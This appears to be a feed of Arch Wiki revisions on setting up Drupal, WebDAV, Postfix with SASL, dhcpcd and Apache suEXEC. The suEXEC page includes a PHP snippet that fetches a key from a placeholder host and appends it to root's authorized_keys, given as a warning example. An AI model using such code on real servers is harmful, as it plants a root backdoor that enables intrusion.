===Installing Postfix===<br />
In order to send e-mails with Drupal, you will need to install [[postfix]]. Drupal uses e-mails for account verification, password recovery, etc.<br />
#Install Postfix<pre># pacman -S postfix </pre><br />
#Configure Postfix as needed <pre># nano /etc/postfix/main.cf </pre> All that you should have to do is change the hostnames under "Internet Host and Domain Names" <pre> myhostname = hostname1 </pre><br>And then start the Postfix service:<pre># rc.d start postfix</pre><br />
#Send a test e-mail to yourself <pre> mail myusername@localhost </pre> (Enter a subject, some words in the body, then press ctrl+d to exit and send the letter) Wait 10 seconds, and then type {{Ic|mail}} to check your mail. If you've gotten it, excellent.<br />
#Make sure Port 25 is fowarded if you have a router so that mails can be sent to the Internet at large<br />
#Open the file {{ic|/etc/php/php.ini}} with your editor of choice, e.g. <pre># nano /etc/php/php.ini</pre> Find the line that starts with, {{Ic|<nowiki>;sendmail_path=""</nowiki>}} and change it to {{Ic|<nowiki>sendmail_path="/usr/sbin/sendmail -t -i"</nowiki>}}<br />
#Restart the Apache web server<pre>rc.d restart httpd</pre><br />
<br />
==Tips and Tricks==<br />
<br />
===Scheduling with Cron===<br />
Drupal recommends running cron jobs hourly. Cron can be executed from the browser by visiting '''<code>localhost/cron</code>''' It is also possible to run cron via script by copying the appropriate file from the "scripts" folder into {{ic|/etc/cron.hourly}} and making it executable.<br />
<br />
===Xampp Compatibility===<br />
<br />
The 5.x and 6.x series of Drupal do not support PHP 5.3, and as a result are incompatible with the latest release of [[Xampp]]. Currently, the last Drupal-compatible version of Xampp is 1.7.1.<br />
<br />
Note: Xampp's PHP memory limit currently defaults to 8MB. Also, Xampp ignores php.ini files in the Drupal directory. To fix this:<br />
#edit Xampp's php.ini file using your favorite editor.<pre>nano /opt/lampp/etc/php.ini</pre><br />
#Search for the "memory_limit" line, and replace it with an appropriate value. (Most Drupal installations are happy with 32M, but sites with a lot of modules may need 100M or more.)<br />
#Restart Xampp.<pre>/opt/lampp/lampp restart</pre><br />
<br />
===Upload progress Not enabled===<br />
<br />
Upon successful installation you may see the following message in the Status Report:<br />
{{Box BLUE||Your server is capable of displaying file upload progress, but does not have the required libraries. It is recommended to install the PECL uploadprogress library (preferred) or to install APC.}}<br />
<br><br />
First, install the <code>php-pear</code> package:<br />
<pre># pacman -S php-pear</pre><br />
Next, use the <code>pecl</code> command to automatically download, compile and install the library:<br />
<pre># pecl install uploadprogress</pre><br />
Finally, add to {{ic|/etc/php/php.ini}}<br />
<pre>extension=uploadprogress.so</pre><br />
Restart apache.<br />
<br />
==Troubleshooting==<br />
<br />
===Browser shows the actual PHP code when visiting localhost===<br />
<br />
You do not have php-apache installed.<br />
<pre># pacman -S php-apache</pre><br />
<br />
Then, enable the PHP module in {{ic|/etc/httpd/conf/httpd.conf}} by adding the following lines in the appropriate sections:<br />
<pre>LoadModule php5_module modules/libphp5.so<br />
Include conf/extra/php5_module.conf</pre><br />
<br />
If, when starting httpd, you get the following error:<br />
<pre>httpd: Could not reliably determine the server's fully qualified domain name, using 127.0.0.1 for ServerName</pre><br />
You should edit {{ic|httpd.conf}}<br />
<pre># nano /etc/httpd/conf/httpd.conf</pre><br />
In that file find the line that looks similar to<br />
<pre>#ServerName www.example.com:80</pre><br />
Uncomment it (remove # from the front) and adjust the address as needed. Restart httpd by<br />
<pre># /etc/rc.d/httpd restart</pre><br />
or<br />
<pre># rc.d restart httpd</pre> and you are ready to go!<br />
<br />
===Drupal's setup page is not the initial page when accessing localhost===<br />
<br />
In this situation, you should navigate in your {{ic|/srv}} directory and look for the {{ic|drupal}} folder (most probably it will be in the {{ic|http}} directory). Then edit {{ic|httpd.conf}} by<br />
<pre># nano /etc/httpd/conf/httpd.conf</pre><br />
and look for a line starting with {{Ic|DocumentRoot}} and change the path with that folder's path (for me it looks like DocumentRoot "/srv/http/drupal") and also find another line starting with <pre><Directory</pre> and set the same path there as well. Restart httpd by <pre># rc.d restart httpd</pre> and you will be done.<br />
<br />
===Drupal's setup page does not start and shows HTTP ERROR 500===<br />
<br />
This may be because Drupal needs the {{Ic|json.so}} extension to be activated in your {{ic|/etc/php/php.ini}}.<br />
just uncomment the line <br />
{{Ic|<nowiki>;extension=json.so</nowiki>}}<br />
from {{ic|/etc/php/php.ini}} by deleting the initial ';' and restart httpd service by typing<br />
<code>rc.d restart httpd</code>.<br />
(See [http://drupal.org/node/1018824 this link] for info.)<br />
<br />
==More Resources==<br />
* [http://drupal.org/handbook Official Drupal Documentation]<br />
* [http://drupal.org/node/307956 Simple Guide to Install Drupal on Xampp]<br />
* [http://wiki.archlinux.org/index.php/LAMP LAMP (How to setup an apache server)]</div>Wakehttps://wiki.archlinux.org/index.php?title=Drupal&diff=236064Drupal2012-11-20T03:29:26Z<p>Wake: /* from Arch repositories */ Update and cleanup.</p>
<hr />
<div>[[it:Drupal]]<br />
[[sr:Drupal]]<br />
[[zh-CN:Drupal]]<br />
[[Category:Web Server]]<br />
<br />
''"Drupal is a free and open source content management system (CMS) and Content Management framework (CMF) written in PHP and distributed under the GNU General Public License."'' - [http://en.wikipedia.org/wiki/Drupal Wikipedia]<br />
<br />
This article describes how to setup Drupal and configure [[Apache]], [[MySQL]] or [[PostgreSQL]], [[PHP]], and [[Postfix]] to work with it. It is assumed that you have some sort of [[LAMP]] (Apache, MySQL, PHP) or LAPP (Apache, PostgreSQL, PHP) server already setup.<br />
<br />
==Installation==<br />
<br />
===Installing Drupal===<br />
<br />
====from Arch repositories====<br />
#Install the {{Pkg|drupal}} package from [[community]] using [[pacman]].<br />
#Edit {{ic|/etc/php/php.ini}}:<br />
#*If PHP version is less than 5.2.0, Find the line with "{{Ic|<nowiki>;extension=json.so</nowiki>}}" and uncomment it by removing the ";" from the beginning of the line if necessary. If no such line is found, add it to the {{Ic|<nowiki>[PHP]</nowiki>}} section of the file. <br />
#*For Drupal 7, enable a PDO extension for your database. For MySQL, the line {{Ic|<nowiki>extension=pdo_mysql.so</nowiki>}} should be uncommented.<br />
#*Find the line beginning "{{Ic|<nowiki>open_basedir =</nowiki>}}". Add the Drupal install directories, {{ic|/usr/share/webapps/drupal/}} and {{ic|/var/lib/drupal/}}. {{ic|/srv/http/}} can be removed if you do not intend to use it.<br />
#Edit {{ic|/etc/httpd/conf/httpd.conf}}:<br />
#*If your webserver is dedicated to drupal,<br />
#**Find the line {{ic|DocumentRoot "/srv/http"}} and change it to the Drupal install directory, ''i.e.'' {{ic|DocumentRoot "/usr/share/webapps/drupal"}}.<br />
#**Find the section that starts with "{{Ic|&lt;Directory "/srv/http"&gt;}}" and change {{ic|/srv/http}} to the Drupal install directory, {{ic|/usr/share/webapps/drupal}}. In the same section, make sure it includes a line "{{Ic|AllowOverride All}}" to enable the clean URL's.<br />
#*If you are using Apache Virtual Hosts, see [[Apache#Virtual_Hosts]].<br />
#Comment out the '{{Ic|deny from all}}' line of the {{ic|/usr/share/webapps/drupal/.htaccess}} file to enable httpd access.<br />
#[[Daemons#Restarting|Restart]] Apache (httpd).<br />
<br />
====manual install====<br />
<br />
#Download the latest package from http://drupal.org and extract it.<br />
#Move the folders to apache's htdocs folder.<br />
#Open a web browser, and navigate to "localhost"<br />
#Follow the on-screen instructions.<br />
<br />
===Installing GD===<br />
You may need the GD library for your Drupal installation.<br />
#Install the {{Pkg|php-gd}} package<br><pre># pacman -S php-gd</pre><br />
#Open the file {{ic|/etc/php/php.ini}} with your editor of choice, e.g. <pre># nano /etc/php/php.ini</pre> Find the line with {{Ic|<nowiki>;extension=gd.so</nowiki>}} and uncomment it by removing the ";" from the beginning of the line if necessary. If no such line is found, add it to the {{Ic|<nowiki>[PHP]</nowiki>}} section of the file.<br />
#Restart the Apache web server <pre>rc.d restart httpd</pre><br />
<br />
===Installing Postfix===<br />
In order to send e-mails with Drupal, you will need to install [[postfix]]. Drupal uses e-mails for account verification, password recovery, etc.<br />
#Install Postfix<pre># pacman -S postfix </pre><br />
#Configure Postfix as needed <pre># nano /etc/postfix/main.cf </pre> All that you should have to do is change the hostnames under "Internet Host and Domain Names" <pre> myhostname = hostname1 </pre><br>And then start the Postfix service:<pre># rc.d start postfix</pre><br />
#Send a test e-mail to yourself <pre> mail myusername@localhost </pre> (Enter a subject, some words in the body, then press ctrl+d to exit and send the letter) Wait 10 seconds, and then type {{Ic|mail}} to check your mail. If you've gotten it, excellent.<br />
#Make sure Port 25 is fowarded if you have a router so that mails can be sent to the Internet at large<br />
#Open the file {{ic|/etc/php/php.ini}} with your editor of choice, e.g. <pre># nano /etc/php/php.ini</pre> Find the line that starts with, {{Ic|<nowiki>;sendmail_path=""</nowiki>}} and change it to {{Ic|<nowiki>sendmail_path="/usr/sbin/sendmail -t -i"</nowiki>}}<br />
#Restart the Apache web server<pre>rc.d restart httpd</pre><br />
<br />
==Tips and Tricks==<br />
<br />
===Scheduling with Cron===<br />
Drupal recommends running cron jobs hourly. Cron can be executed from the browser by visiting '''<code>localhost/cron</code>''' It is also possible to run cron via script by copying the appropriate file from the "scripts" folder into {{ic|/etc/cron.hourly}} and making it executable.<br />
<br />
===Xampp Compatibility===<br />
<br />
The 5.x and 6.x series of Drupal do not support PHP 5.3, and as a result are incompatible with the latest release of [[Xampp]]. Currently, the last Drupal-compatible version of Xampp is 1.7.1.<br />
<br />
Note: Xampp's PHP memory limit currently defaults to 8MB. Also, Xampp ignores php.ini files in the Drupal directory. To fix this:<br />
#edit Xampp's php.ini file using your favorite editor.<pre>nano /opt/lampp/etc/php.ini</pre><br />
#Search for the "memory_limit" line, and replace it with an appropriate value. (Most Drupal installations are happy with 32M, but sites with a lot of modules may need 100M or more.)<br />
#Restart Xampp.<pre>/opt/lampp/lampp restart</pre><br />
<br />
===Upload progress Not enabled===<br />
<br />
Upon successful installation you may see the following message in the Status Report:<br />
{{Box BLUE||Your server is capable of displaying file upload progress, but does not have the required libraries. It is recommended to install the PECL uploadprogress library (preferred) or to install APC.}}<br />
<br><br />
First, install the <code>php-pear</code> package:<br />
<pre># pacman -S php-pear</pre><br />
Next, use the <code>pecl</code> command to automatically download, compile and install the library:<br />
<pre># pecl install uploadprogress</pre><br />
Finally, add to {{ic|/etc/php/php.ini}}<br />
<pre>extension=uploadprogress.so</pre><br />
Restart apache.<br />
<br />
==Troubleshooting==<br />
<br />
===Browser shows the actual PHP code when visiting localhost===<br />
<br />
You do not have php-apache installed.<br />
<pre># pacman -S php-apache</pre><br />
<br />
Then, enable the PHP module in {{ic|/etc/httpd/conf/httpd.conf}} by adding the following lines in the appropriate sections:<br />
<pre>LoadModule php5_module modules/libphp5.so<br />
Include conf/extra/php5_module.conf</pre><br />
<br />
If, when starting httpd, you get the following error:<br />
<pre>httpd: Could not reliably determine the server's fully qualified domain name, using 127.0.0.1 for ServerName</pre><br />
You should edit {{ic|httpd.conf}}<br />
<pre># nano /etc/httpd/conf/httpd.conf</pre><br />
In that file find the line that looks similar to<br />
<pre>#ServerName www.example.com:80</pre><br />
Uncomment it (remove # from the front) and adjust the address as needed. Restart httpd by<br />
<pre># /etc/rc.d/httpd restart</pre><br />
or<br />
<pre># rc.d restart httpd</pre> and you are ready to go!<br />
<br />
===Drupal's setup page is not the initial page when accessing localhost===<br />
<br />
In this situation, you should navigate in your {{ic|/srv}} directory and look for the {{ic|drupal}} folder (most probably it will be in the {{ic|http}} directory). Then edit {{ic|httpd.conf}} by<br />
<pre># nano /etc/httpd/conf/httpd.conf</pre><br />
and look for a line starting with {{Ic|DocumentRoot}} and change the path with that folder's path (for me it looks like DocumentRoot "/srv/http/drupal") and also find another line starting with <pre><Directory</pre> and set the same path there as well. Restart httpd by <pre># rc.d restart httpd</pre> and you will be done.<br />
<br />
===Drupal's setup page does not start and shows HTTP ERROR 500===<br />
<br />
This may be because Drupal needs the {{Ic|json.so}} extension to be activated in your {{ic|/etc/php/php.ini}}.<br />
just uncomment the line <br />
{{Ic|<nowiki>;extension=json.so</nowiki>}}<br />
from {{ic|/etc/php/php.ini}} by deleting the initial ';' and restart httpd service by typing<br />
<code>rc.d restart httpd</code>.<br />
(See [http://drupal.org/node/1018824 this link] for info.)<br />
<br />
==More Resources==<br />
* [http://drupal.org/handbook Official Drupal Documentation]<br />
* [http://drupal.org/node/307956 Simple Guide to Install Drupal on Xampp]<br />
* [http://wiki.archlinux.org/index.php/LAMP LAMP (How to setup an apache server)]</div>Wakehttps://wiki.archlinux.org/index.php?title=Drupal&diff=236052Drupal2012-11-20T02:55:00Z<p>Wake: /* from Arch repositories */ Make php < 5.2.0 the exception. Don't need to tell people what editor to use, etc.</p>
<hr />
<div>[[it:Drupal]]<br />
[[sr:Drupal]]<br />
[[zh-CN:Drupal]]<br />
[[Category:Web Server]]<br />
<br />
''"Drupal is a free and open source content management system (CMS) and Content Management framework (CMF) written in PHP and distributed under the GNU General Public License."'' - [http://en.wikipedia.org/wiki/Drupal Wikipedia]<br />
<br />
This article describes how to setup Drupal and configure [[Apache]], [[MySQL]] or [[PostgreSQL]], [[PHP]], and [[Postfix]] to work with it. It is assumed that you have some sort of [[LAMP]] (Apache, MySQL, PHP) or LAPP (Apache, PostgreSQL, PHP) server already setup.<br />
<br />
==Installation==<br />
<br />
===Installing Drupal===<br />
<br />
====from Arch repositories====<br />
#Install the {{Pkg|drupal}} package from [[community]] using [[pacman]].<br />
#Edit {{ic|/etc/php/php.ini}}:<br />
#*If PHP version is less than 5.2.0, Find the line with "{{Ic|<nowiki>;extension=json.so</nowiki>}}" and uncomment it by removing the ";" from the beginning of the line if necessary. If no such line is found, add it to the {{Ic|<nowiki>[PHP]</nowiki>}} section of the file. <br />
#*For Drupal 7, enable a PDO extension for your database. For MySQL, the line {{Ic|<nowiki>extension=pdo_mysql.so</nowiki>}} should be uncommented.<br />
#*Find the line beginning "{{Ic|<nowiki>open_basedir =</nowiki>}}". Add the Drupal install directories, {{ic|/usr/share/webapps/drupal/}} and {{ic|/var/lib/drupal/}}. {{ic|/srv/http/}} can also be removed if you do not intend to use it.<br />
#Edit {{ic|/etc/httpd/conf/httpd.conf}}:<br />
#*Find the line {{ic|DocumentRoot "/srv/http"}} and change it to the Drupal install directory, i.e. {{ic|DocumentRoot "/usr/share/webapps/drupal"}}.<br />
#*Find the section that starts with "{{Ic|&lt;Directory "/srv/http"&gt;}}" and change {{ic|/srv/http}} to the Drupal install directory, {{ic|/usr/share/webapps/drupal}}.<br />
#*In the same section you will find a line that reads "{{Ic|AllowOverride None}}". Replace it with "{{Ic|AllowOverride All}}" to enable the clean URL's.<br />
#[[Daemons#Restarting|Restart]] Apache (httpd).<br />
{{Note|In the Drupal package from the community repository the first line of the {{ic|.htaccess}} file is set to '{{Ic|deny from all}}' unlike in the {{ic|.htaccess}} file from drupal.org. This disables access to the {{ic|drupal}} directory so one can not activate Drupal. Commenting out that line solves the problem.}}<br />
<br />
====manual install====<br />
<br />
#Download the latest package from http://drupal.org and extract it.<br />
#Move the folders to apache's htdocs folder.<br />
#Open a web browser, and navigate to "localhost"<br />
#Follow the on-screen instructions.<br />
<br />
===Installing GD===<br />
You may need the GD library for your Drupal installation.<br />
#Install the {{Pkg|php-gd}} package<br><pre># pacman -S php-gd</pre><br />
#Open the file {{ic|/etc/php/php.ini}} with your editor of choice, e.g. <pre># nano /etc/php/php.ini</pre> Find the line with {{Ic|<nowiki>;extension=gd.so</nowiki>}} and uncomment it by removing the ";" from the beginning of the line if necessary. If no such line is found, add it to the {{Ic|<nowiki>[PHP]</nowiki>}} section of the file.<br />
#Restart the Apache web server <pre>rc.d restart httpd</pre><br />
<br />
===Installing Postfix===<br />
In order to send e-mails with Drupal, you will need to install [[postfix]]. Drupal uses e-mails for account verification, password recovery, etc.<br />
#Install Postfix<pre># pacman -S postfix </pre><br />
#Configure Postfix as needed <pre># nano /etc/postfix/main.cf </pre> All that you should have to do is change the hostnames under "Internet Host and Domain Names" <pre> myhostname = hostname1 </pre><br>And then start the Postfix service:<pre># rc.d start postfix</pre><br />
#Send a test e-mail to yourself <pre> mail myusername@localhost </pre> (Enter a subject, some words in the body, then press ctrl+d to exit and send the letter) Wait 10 seconds, and then type {{Ic|mail}} to check your mail. If you've gotten it, excellent.<br />
#Make sure Port 25 is fowarded if you have a router so that mails can be sent to the Internet at large<br />
#Open the file {{ic|/etc/php/php.ini}} with your editor of choice, e.g. <pre># nano /etc/php/php.ini</pre> Find the line that starts with, {{Ic|<nowiki>;sendmail_path=""</nowiki>}} and change it to {{Ic|<nowiki>sendmail_path="/usr/sbin/sendmail -t -i"</nowiki>}}<br />
#Restart the Apache web server<pre>rc.d restart httpd</pre><br />
<br />
==Tips and Tricks==<br />
<br />
===Scheduling with Cron===<br />
Drupal recommends running cron jobs hourly. Cron can be executed from the browser by visiting '''<code>localhost/cron</code>''' It is also possible to run cron via script by copying the appropriate file from the "scripts" folder into {{ic|/etc/cron.hourly}} and making it executable.<br />
<br />
===Xampp Compatibility===<br />
<br />
The 5.x and 6.x series of Drupal do not support PHP 5.3, and as a result are incompatible with the latest release of [[Xampp]]. Currently, the last Drupal-compatible version of Xampp is 1.7.1.<br />
<br />
Note: Xampp's PHP memory limit currently defaults to 8MB. Also, Xampp ignores php.ini files in the Drupal directory. To fix this:<br />
#edit Xampp's php.ini file using your favorite editor.<pre>nano /opt/lampp/etc/php.ini</pre><br />
#Search for the "memory_limit" line, and replace it with an appropriate value. (Most Drupal installations are happy with 32M, but sites with a lot of modules may need 100M or more.)<br />
#Restart Xampp.<pre>/opt/lampp/lampp restart</pre><br />
<br />
===Upload progress Not enabled===<br />
<br />
Upon successful installation you may see the following message in the Status Report:<br />
{{Box BLUE||Your server is capable of displaying file upload progress, but does not have the required libraries. It is recommended to install the PECL uploadprogress library (preferred) or to install APC.}}<br />
<br><br />
First, install the <code>php-pear</code> package:<br />
<pre># pacman -S php-pear</pre><br />
Next, use the <code>pecl</code> command to automatically download, compile and install the library:<br />
<pre># pecl install uploadprogress</pre><br />
Finally, add to {{ic|/etc/php/php.ini}}<br />
<pre>extension=uploadprogress.so</pre><br />
Restart apache.<br />
<br />
==Troubleshooting==<br />
<br />
===Browser shows the actual PHP code when visiting localhost===<br />
<br />
You do not have php-apache installed.<br />
<pre># pacman -S php-apache</pre><br />
<br />
Then, enable the PHP module in {{ic|/etc/httpd/conf/httpd.conf}} by adding the following lines in the appropriate sections:<br />
<pre>LoadModule php5_module modules/libphp5.so<br />
Include conf/extra/php5_module.conf</pre><br />
<br />
If, when starting httpd, you get the following error:<br />
<pre>httpd: Could not reliably determine the server's fully qualified domain name, using 127.0.0.1 for ServerName</pre><br />
You should edit {{ic|httpd.conf}}<br />
<pre># nano /etc/httpd/conf/httpd.conf</pre><br />
In that file find the line that looks similar to<br />
<pre>#ServerName www.example.com:80</pre><br />
Uncomment it (remove # from the front) and adjust the address as needed. Restart httpd by<br />
<pre># /etc/rc.d/httpd restart</pre><br />
or<br />
<pre># rc.d restart httpd</pre> and you are ready to go!<br />
<br />
===Drupal's setup page is not the initial page when accessing localhost===<br />
<br />
In this situation, you should navigate in your {{ic|/srv}} directory and look for the {{ic|drupal}} folder (most probably it will be in the {{ic|http}} directory). Then edit {{ic|httpd.conf}} by<br />
<pre># nano /etc/httpd/conf/httpd.conf</pre><br />
and look for a line starting with {{Ic|DocumentRoot}} and change the path with that folder's path (for me it looks like DocumentRoot "/srv/http/drupal") and also find another line starting with <pre><Directory</pre> and set the same path there as well. Restart httpd by <pre># rc.d restart httpd</pre> and you will be done.<br />
<br />
===Drupal's setup page does not start and shows HTTP ERROR 500===<br />
<br />
This may be because Drupal needs the {{Ic|json.so}} extension to be activated in your {{ic|/etc/php/php.ini}}.<br />
just uncomment the line <br />
{{Ic|<nowiki>;extension=json.so</nowiki>}}<br />
from {{ic|/etc/php/php.ini}} by deleting the initial ';' and restart httpd service by typing<br />
<code>rc.d restart httpd</code>.<br />
(See [http://drupal.org/node/1018824 this link] for info.)<br />
<br />
==More Resources==<br />
* [http://drupal.org/handbook Official Drupal Documentation]<br />
* [http://drupal.org/node/307956 Simple Guide to Install Drupal on Xampp]<br />
* [http://wiki.archlinux.org/index.php/LAMP LAMP (How to setup an apache server)]</div>Wakehttps://wiki.archlinux.org/index.php?title=WebDAV&diff=235953WebDAV2012-11-19T04:45:01Z<p>Wake: systemd and style changes</p>
<hr />
<div>[[Category:Networking]]<br />
WebDAV stands for '''Web''' '''D'''istributed '''A'''uthoring and '''V'''ersionin, see RFC 2518[http://www.ietf.org/rfc/rfc2518.txt]. <br />
<br />
WebDAV is an extension of the HTTP 1.1 Procotol, therefore can be considered to be a Procotol, and contains a set of concepts and accompanying extension methods to allow read and write across the HTTP 1.1 protocol. Instead of using nfs, or smb, WebDAV offers file transfers via HTTP. <br />
<br />
The goal of this how to is to setup webdav with apache. Simple configuration only.<br />
<br />
See also [[File Sharing with Webdav and DNSSD]].<br />
<br />
== Apache Installation ==<br />
{{pkg|apache}} and {{pkg|cadaver}} is needed.<br />
This how to does not cover installation and initial setup of apache. You must [[Daemons#Restarting|restart]] Apache (httpd) after any changes to httpd.conf.<br />
<br />
==WebDav Configuration==<br />
<br />
=== httpd.conf ===<br />
Edit /etc/httpd/conf/httpd.conf. Add the following line:<br />
DAVLockDB /home/httpd/DAV/DAVLock<br />
<br />
Make sure you add it outside of any other directives, at the \"top level\" of the config file heirarchy.<br />
* note: I put it right under the DocumentRoot definition.<br />
<br />
Next, add the following:<br />
{{bc|<br />
<Directory "/home/httpd/html/dav"><br />
DAV On<br />
AllowOverride None<br />
Options Indexes FollowSymLinks<br />
Order allow,deny<br />
Allow from all<br />
</Directory><br />
}}<br />
<br />
*note: This should also be put in the top level heiracrchy. I put it right before the "UserDir public_html" section, and after the most previous "</Directory>".<br />
<br />
=== /srv/http <-> /home/httpd Amendment ===<br />
{{Poor writing|written in first person.}}<br />
This didn't work out of the box. I'm hoping the original author can figure out how to adjust this tutorial b/c I'm far from an expert.<br />
Anyways, I could only connect to my dav folder after putting it below my DocumentRoot. For my fresh installation DocumentRoot "/srv/http" not "/home/httpd/". I'm not unsure if this is the author's choice and old default or completely irrelevant.<br />
To sum up, if you use /srv/http instead of /srv/http above (and in other parts of this document) the whole thing works - the rest of my analysis is guesstimation.<br />
<br />
=== Create directories ===<br />
{{bc|<br />
(root@box httpd)# mkdir -p /home/httpd/DAV<br />
(root@box httpd)# chown -R http:http /home/httpd/DAV # Otherwise you wouldn't be able to upload files<br />
(root@box httpd)# mkdir -p /home/httpd/html/dav<br />
(root@box httpd)# chown -R nobody.nobody /home/httpd/html/dav<br />
}}<br />
<br />
==Test==<br />
=== Install cadaver ===<br />
Cadaver is a command line webdav client. It is good for testing.<br />
If it is not in a repository, you can download the file manually from my repository and install it, or you can add my repository to your repo list in pacman.conf.<br />
For more information about those options check CacTus.<br />
Ok. Now back to it..<br />
(root@box httpd)# pacman -S cadaver<br />
<br />
=== Try to connect ===<br />
Note: ipaddress can also be a hostname<br />
{{bc|<br />
(root@box httpd)# cadaver http://ipaddress/dav<br />
dav:/dav/> mkcol test<br />
Creating `test': succeeded.<br />
dav:/dav/> ls<br />
Listing collection `/dav/': succeeded.<br />
Coll: test 0 Feb 22 20:31<br />
dav:/dav/> exit<br />
}}<br />
<br />
If the above worked as shown, then you are good to go.<br />
<br />
Make sure you add [[WebDAV_authentication|permissions]] for viewing and dav access to the directory, and maybe even make that directory ssl access only.<br />
<br />
== Authentication ==<br />
Make sure you add permissions for viewing and dav access to the directory, and maybe even make that directory ssl access only.<br />
<br />
There are numerous different protocols you can use:<br />
* plain<br />
* digest<br />
* others<br />
<br />
This is an example for using digest (make sure it is enabled in httpd.conf)<br />
{{bc|htdigest -c /etc/httpd/conf/passwd WebDAV foo}}<br />
<br />
Please make sure that the path is identical to the one you entered in your httpd.conf. Also when using digest you have to enter the AuthName from httpd.conf. For plain authentication you would not need this.<br />
<br />
To require user *foo* for everything:<br />
{{bc|<br />
<Directory "/home/httpd/html/dav"><br />
DAV On<br />
AllowOverride None<br />
Options Indexes FollowSymLinks<br />
Order allow,deny<br />
AuthType Digest<br />
AuthName "WebDAV"<br />
AuthUserFile /etc/httpd/conf/passwd<br />
Require user foo<br />
Allow from all<br />
</Directory><br />
}}<br />
<br />
If you want to permit everybody to read, you could use this in your httpd.conf<br />
{{bc|<br />
<Directory "/home/httpd/html/dav"><br />
DAV On<br />
AllowOverride None<br />
Options Indexes FollowSymLinks<br />
Order allow,deny<br />
AuthType Digest<br />
AuthName "WebDAV"<br />
AuthUserFile /etc/httpd/conf/passwd<br />
Allow from all<br />
<LimitExcept GET HEAD OPTIONS PROPFIND><br />
require user foo<br />
</LimitExcept><br />
</Directory><br />
}}</div>Wakehttps://wiki.archlinux.org/index.php?title=Postfix_with_SASL&diff=235951Postfix with SASL2012-11-19T04:34:35Z<p>Wake: systemd and style changes</p>
<hr />
<div>[[Category:Mail Server]]<br />
The postfix package in [extra] is compiled with sasl support:<br />
pacman -S postfix<br />
<br />
An example line for the {{ic|/etc/postfix/main.cf}} file to enable the SASL is below.<br />
{{bc|<nowiki><br />
mydestination = $myhostname, localhost.$mydomain, $mydomain<br />
myorigin = $mydomain<br />
smtpd_sasl_auth_enable = yes<br />
smtpd_sasl_security_options = noanonymous<br />
smtpd_sasl_tls_security_options = $smtpd_sasl_security_options<br />
smtpd_tls_auth_only = no<br />
smtpd_sasl_local_domain = $mydomain<br />
smtpd_recipient_restrictions = permit_mynetworks,permit_sasl_authenticated,reject_unauth_destination,permit<br />
broken_sasl_auth_clients = yes<br />
relay_domains = *</nowiki><br />
}}<br />
<br />
You might want to change various options to suit your needs though.<br />
Setup Postfix as you normally would and [[Daemons#Starting_manually|start]] it.<br />
If you want to start it at boot time see [[Daemons#Starting_on_boot]].<br />
<br />
SASL can use different authentication methods. The default one is PAM (as configured in {{ic|/etc/conf.d/saslauthd}}), but to set it up properly you have to create {{ic|/usr/lib/sasl2/smtpd.conf}}:<br />
<br />
{{bc|<br />
pwcheck_method: saslauthd<br />
saslauthd_path: /var/run/saslauthd/mux<br />
mech_list: plain login<br />
log_level: 7<br />
}}<br />
<br />
To read about other authentication methods please refer to http://www.postfix.org/SASL_README.html<br />
<br />
Hopefully you should be able to telnet to your Postfix server with :<br />
<br />
{{ic|telnet localhost 25}}<br />
<br />
You should then type :<br />
<br />
{{ic|EHLO test.com}}<br />
<br />
This is roughly what you should see :<br />
<br />
{{bc|<br />
Trying 127.0.0.1...<br />
<br />
Connected to localhost.localdomain<br />
Escape character is '^]'<br />
<br />
220 justin ESMTP Postfix<br />
EHLO test.com<br />
250-justin<br />
250-PIPELINING<br />
250-SIZE 10240000<br />
250-VRFY<br />
250-ETRN<br />
250-AUTH PLAIN OTP DIGEST-MD5 CRAM-MD5<br />
250-AUTH<nowiki>=</nowiki>PLAIN OTP DIGEST-MD5 CRAM-MD5<br />
250 8BITMIME<br />
}}</div>Wakehttps://wiki.archlinux.org/index.php?title=Dhcpcd&diff=235154Dhcpcd2012-11-13T02:45:13Z<p>Wake: Candidate for deletion?</p>
<hr />
<div>[[Category:Networking]]<br />
[[Category:Daemons and system services]]<br />
{{Stub|Could be deleted. [[Network#Dynamic_IP_address]] provides all this info.}}<br />
{{Out of date|This article still references rc.conf, which has been deprecated.}}<br />
<br />
<br />
Dhcpcd is not [[Dhcpd]]<br />
<br />
In rc.conf, if you configure your interface to use dhcp, like this:<br />
<br />
interface=eth0<br />
address=<br />
netmask=<br />
gateway=<br />
<br />
''dhcpcd'' will be started automatically from the ''network'' script found in /etc/rc.d and configured in /etc/rc.conf in the DAEMONS array<br />
<br />
You can run to check it out for yourself<br />
ps -ax<br />
710 ? Ss 0:00 dhcpcd -q eth0<br />
<br />
So, you don't need to add ''dhcpcd'' daemon<br />
<br />
== Configuration ==<br />
=== Prevent dhcpcd to change /etc/resolv.conf ===<br />
just add a line in ''/etc/dhcpcd.conf''<br />
nohook resolv.conf</div>Wakehttps://wiki.archlinux.org/index.php?title=Apache,_suEXEC_and_Virtual_Hosts&diff=235023Apache, suEXEC and Virtual Hosts2012-11-12T05:44:53Z<p>Wake: /* Finishing up */ systemd changes</p>
<hr />
<div>[[es:Apache, suEXEC and Virtual Hosts]]<br />
[[zh-CN:Apache, suEXEC and Virtual Hosts]]<br />
[[Category:Web Server]]<br />
<br />
This document describes how to use Apache's suEXEC module in order to have virtual hosts running as a unprivileged user. Generally it's good practice not to let any kind of webspace have superuser privileges like this rather brutal PHP example shows:<br />
<br />
<pre><br />
<?php<br />
# of course this link doesn't lead anywhere<br />
$rsa_key = file('http://yourhost.homeip.net/id_rsa.pub');<br />
exec("cat ${rsa_key[[0]]} >>/root/.ssh/authorized_keys");<br />
?><br />
</pre><br />
<br />
You get the point, do you? To prevent this, never let any virtual host have write access anywhere but in its own home directory or DocumentRoot. Unfortunately this method requires Apache to run as superuser in order to be able to become another user but it's not a big deal since you do not need to run in the default DocumentRoot as superuser too.<br />
<br />
You should also consider using suEXEC if you intend to have several FTP accounts pointing to those webspaces which need write permissions while the files still can be read by Apache.<br />
<br />
== Prerequisites ==<br />
* you should be familiar with basic configuration of Apache<br />
** especially virtual hosts<br />
* superuser access to the target box<br />
* knowledge about adding users<br />
* can work with pacman<br />
<br />
== Adding the suEXEC module to Apache ==<br />
* load the suEXEC module in {{ic|/etc/httpd/conf/httpd.conf}} like this:<br />
<br />
LoadModule suexec_module lib/apache/mod_suexec.so<br />
<br />
* make sure Apache's default DocumentRoot does not run as superuser either!<br />
<br />
User http<br />
Group http<br />
<br />
== Setting up a virtual Host to use suEXEC ==<br />
One way to do it is directly in {{ic|/etc/httpd/conf/httpd.conf}} but I suggest to use a separate file if you intend to create more than just a couple of virtual hosts. Either way, a virtual host that is supposed to use suEXEC may look something like this:<br />
<br />
<pre><br />
<VirtualHost 192.168.0.1:80><br />
ServerName myhost<br />
